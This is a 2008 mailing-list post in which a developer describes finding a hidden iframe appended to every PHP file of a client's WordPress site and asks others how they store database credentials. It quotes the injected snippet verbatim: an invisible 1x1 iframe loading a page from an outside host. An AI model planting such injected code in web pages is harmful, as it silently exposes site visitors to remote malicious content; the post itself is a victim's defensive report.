[FX.php List] [OFF] Security

Jonathan Schwartz jschwartz at exit445.com
Wed Apr 23 16:57:14 MDT 2008


Hi Folks,

Different Day, Different Challenge.

I had to deal with a client's issue today on a third party shared 
server.  It appears that a bot (?) got in and appended a line of code 
to each php file in a WordPress directory:

<!--LiveInternet counter--><iframe 
src="http://liveinternets.com/all/update.php" width=1 height=1 
style="visibility:hidden;position:absolute"></iframe><!--/LiveInternet-->

No sure what it is supposed to do, but it managed to generate PHP 
buffer errors and stop the site in its tracks.  Thankfully, a 
multi-file global find/replace was able to do away with the offending 
code.

None of my code was affected.

Now that I've experienced my first attack, I'm focused on security. 
I'm interested to know if folks store username and passwords in the 
FX/server-data.php file. Or, relocate these "keys to the kingdom" 
remotely?  I have seen advise to keep the info out of the web server 
folder altogether.

Any war stories?

J
-- 
Jonathan Schwartz
Exit 445 Group
jonathan at exit445.com
http://www.exit445.com
415-381-1852


More information about the FX.php_List mailing list